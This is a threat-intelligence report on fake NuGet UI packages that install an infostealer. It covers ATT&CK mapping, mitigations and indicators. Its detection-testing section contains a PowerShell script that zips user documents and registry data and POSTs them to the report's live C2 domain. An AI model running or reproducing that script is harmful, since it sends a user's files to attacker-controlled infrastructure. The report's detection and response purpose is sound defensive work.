Five Fake NuGet UI Packages Deliver Crypto Wallet and Credential Stealers

SOC Prime Team

Five Fake NuGet UI Packages Deliver Crypto Wallet and Credential Stealers

Detection stack

AIDR
Alert
ETL
Query

Threat Report
Attack Flow
Detections
Simulations

Summary

Five NuGet packages published under the account bmrxntfj impersonate well-known Chinese .NET UI libraries and embed an infostealer protected with .NET Reactor. The malicious payload activates as soon as the DLL is loaded, hijacks the JIT compiler, and steals browser credentials, cryptocurrency wallet data, SSH keys, and local files before exfiltrating them to a newly registered command-and-control domain. Frequent version changes and hidden package listings help the operation evade simple hash-based detections, creating risk for both developer workstations and CI/CD environments.

Investigation

Researchers unpacked the .NET Reactor-protected malware, identified a second-stage .NET assembly named we4ftg.exe, and recovered configuration strings from memory. Their analysis showed which browsers and wallet extensions were targeted, documented a custom HTTP header scheme, and identified a staging location under the OneDrive directory. The investigation also uncovered infrastructure details including the command-and-control domain, its IP address, and a related private Git server.

Mitigation

Defenders should block DNS resolution and outbound traffic to the identified command-and-control domain and IP address, monitor for creation of the keys.dat file inside the OneDrive folder, and alert on the custom X-xxx HTTP header. Any IR.* packages should be removed from dependency trees and replaced with verified legitimate libraries. All potentially exposed credentials, tokens, and secrets should be rotated immediately.

Response

Any system that restored or loaded one of the malicious IR.* packages should be treated as compromised, isolated, and subjected to full credential rotation. Detection content should be updated with the published indicators, and teams should coordinate with NuGet Gallery administrators to ensure the malicious packages are removed and the publisher account is suspended.

"graph TB %% Class definitions classDef technique fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff classDef data fill:#ccffcc classDef operator fill:#ff9900 %% Nodes – Techniques tech_supply_chain["Technique – T1195.002 Supply Chain Compromise Description: Compromise of a software supply chain to inject malicious code into legitimate packages."] class tech_supply_chain technique tech_appdomain_hijack["Technique – T1574.014 Hijack Execution Flow: .NET AppDomain Manager Description: Adversaries hijack the .NET AppDomainManager to execute code before the intended application starts."] class tech_appdomain_hijack technique tech_obfuscation["Technique – T1027 Obfuscated Files or Information Description: Use of packing, encryption, or other methods to hide malicious code or data."] class tech_obfuscation technique tech_trusted_dev_proxy["Technique – T1127 Trusted Developer Utilities Proxy Execution Description: Abuse of legitimate developer utilities or package managers to run malicious code."] class tech_trusted_dev_proxy technique tech_software_ext["Technique – T1176 Software Extensions Description: Leveraging software extensions or plugu2011ins to gain execution."] class tech_software_ext technique tech_process_discovery["Technique – T1057 Process Discovery Description: Enumerate running processes on the victim system."] class tech_process_discovery technique tech_file_dir_discovery["Technique – T1083 File and Directory Discovery Description: List files and directories to locate valuable data."] class tech_file_dir_discovery technique tech_browser_info["Technique – T1217 Browser Information Discovery Description: Gather information about installed browsers and extensions."] class tech_browser_info technique tech_browser_credentials["Technique – T1555.003 Credentials from Web Browsers Description: Extract saved passwords, cookies and other credential material from browsers."] class tech_browser_credentials technique tech_private_keys["Technique – T1552.004 Unsecured Credentials: Private Keys Description: Locate and exfiltrate private SSH keys and other cryptographic keys."] class tech_private_keys technique tech_credentials_files["Technique – T1552.001 Credentials in Files Description: Search for credential material stored in configuration or data files."] class tech_credentials_files technique tech_data_staged_local["Technique – T1074.001 Data Staged: Local Description: Collected data is aggregated on the local host before exfiltration."] class tech_data_staged_local technique tech_data_staged_remote["Technique – T1074.002 Data Staged: Remote Description: Data is staged on a remote location such as cloud storage."] class tech_data_staged_remote technique tech_process_injection["Technique – T1055.001 Process Injection: Dynamic-link Library Injection Description: Inject malicious DLLs into legitimate processes for stealthy execution."] class tech_process_injection technique tech_sandbox_evasion["Technique – T1497.002 Virtualization/Sandbox Evasion: User Activity Based Checks Description: Detect sandbox environments by checking for known usernames or computer names."] class tech_sandbox_evasion technique tech_c2_web["Technique – T1071.001 Application Layer Protocol: Web Protocols Description: Use HTTP/S to communicate with command and control servers."] class tech_c2_web technique tech_junk_data["Technique – T1001.001 Data Obfuscation: Junk Data Description: Add random noise to network payloads to hinder detection."] class tech_junk_data technique %% Nodes – Tools and Malware tool_nuget_pkg["Tool – Name: Malicious NuGet Package IR.* Description: Packages published to NuGet that mimic legitimate Chinese .NET libraries and are pulled during restore."] class tool_nuget_pkg tool tool_dotnet_reactor["Tool – Name: .NET Reactor (Necrobit) Description: Packs and encrypts .NET assemblies, adds RSAu20111024 antiu2011tamper signatures."] class tool_dotnet_reactor tool malware_payload["Malware – Name: .NET Reactor Payload Description: Encrypted .NET assembly loaded by the AppDomainManager initializer."] class malware_payload malware tool_sharpinjector["Tool – Name: SharpInjector Description: .NET injector that performs DLL injection into longu2011lived processes such as explorer.exe."] class tool_sharpinjector tool process_explorer["Process – Name: explorer.exe"] class process_explorer process process_dllhost["Process – Name: dllhost.exe"] class process_dllhost process data_staged_file["Data – Path: C:\ProgramData\Microsoft OneDrive\keys.dat"] class data_staged_file data %% Flow Connections tech_supply_chain –>|delivers| tool_nuget_pkg tool_nuget_pkg –>|triggers| tech_appdomain_hijack tech_appdomain_hijack –>|loads| malware_payload malware_payload –>|packed by| tool_dotnet_reactor tool_dotnet_reactor –>|enables| tech_obfuscation tech_obfuscation –>|facilitates| tech_trusted_dev_proxy tech_trusted_dev_proxy –>|uses| tech_software_ext tech_software_ext –>|enables| tech_process_discovery tech_process_discovery –>|leads to| tech_file_dir_discovery tech_file_dir_discovery –>|leads to| tech_browser_info tech_browser_info –>|enables| tech_browser_credentials tech_browser_credentials –>|collects| tech_private_keys tech_private_keys –>|collects| tech_credentials_files tech_credentials_files –>|stages| tech_data_staged_local tech_data_staged_local –>|writes to| data_staged_file data_staged_file –>|syncs to| tech_data_staged_remote tech_data_staged_remote –>|uses| tool_sharpinjector tool_sharpinjector –>|injects into| process_explorer tool_sharpinjector –>|injects into| process_dllhost process_explorer –>|supports| tech_process_injection process_dllhost –>|supports| tech_process_injection tech_process_injection –>|checks for| tech_sandbox_evasion tech_sandbox_evasion –>|allows| tech_c2_web tech_c2_web –>|transmits with| tech_junk_data %% Class Assignments class tech_supply_chain,tech_appdomain_hijack,tech_obfuscation,tech_trusted_dev_proxy,tech_software_ext,tech_process_discovery,tech_file_dir_discovery,tech_browser_info,tech_browser_credentials,tech_private_keys,tech_credentials_files,tech_data_staged_local,tech_data_staged_remote,tech_process_injection,tech_sandbox_evasion,tech_c2_web,tech_junk_data technique class tool_nuget_pkg,tool_dotnet_reactor,tool_sharpinjector tool class malware_payload malware class process_explorer,process_dllhost process class data_staged_file data "

Attack Flow

Attack Narrative & Commands:
An adversary has compromised a legitimate NuGet package that, when imported into a victim .NET application, initiates a PowerShell payload. The payload performs the following steps:
1. Discovery (T1082, T1083): Gather OS version and enumerate user documents.
2. Credential Harvest (T1552.001): Read stored credentials from the registry.
3. Archive (T1560): Compress the harvested files into a ZIP archive.
4. Obfuscate Header (T1027): Add a custom HTTP header X-Auth-Token: <random‑string> to disguise the exfil traffic.
5. C2 Exfiltration (T1071.001, T1005, T1195.002): POST the archive to the malicious C2 server at dns-providersa2.com (or its hard‑coded IP 62.84.102.85).
The use of the X- header directly satisfies the Sigma rule’s http.request.header|contains: "X-" clause, while the destination matches the static IoC.

Regression Test Script:

# -----------------------------------------------------------------
# Regression Test – Trigger “Malicious C2 Communication” Sigma rule
# -----------------------------------------------------------------
# 1. Collect system info (T1082)
$sysInfo = Get-ComputerInfo | Select-Object OSName, OSVersion, WindowsDirectory

# 2. Enumerate user documents (T1083)
$docs = Get-ChildItem "$env:USERPROFILEDocuments" -Recurse -File -ErrorAction SilentlyContinue

# 3. Read a sample credential from registry (T1552.001)
$credPath = "HKCU:SoftwareMicrosoftWindowsCurrentVersionExplorerRunMRU"
$storedCred = (Get-ItemProperty -Path $credPath).MRUList | Out-String

# 4. Package data (T1560)
$tempZip = "$env:TEMPexfil_$(Get-Random).zip"
$items = @($sysInfo, $docs, $storedCred)
Compress-Archive -Path $items -DestinationPath $tempZip -Force

# 5. Prepare custom HTTP header (obfuscation – T1027)
$authToken = "X-Auth-Token: $([guid]::NewGuid().ToString())"

# 6. Exfiltrate via HTTP POST to malicious C2 (T1071.001)
$c2 = "http://dns-providersa2.com/upload"
Invoke-WebRequest -Uri $c2 `
                  -Method Post `
                  -InFile $tempZip `
                  -ContentType "application/octet-stream" `
                  -Headers @{'X-Auth-Token' = $authToken}

# 7. Cleanup local artifact
Remove-Item $tempZip -Force

Cleanup Commands:

# Remove any temporary files that might remain from the test
Get-ChildItem "$env:TEMPexfil_*.zip" -ErrorAction SilentlyContinue | Remove-Item -Force

# Reset firewall log size (optional)
netsh advfirewall set allprofiles logging maxfilesize 4096

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free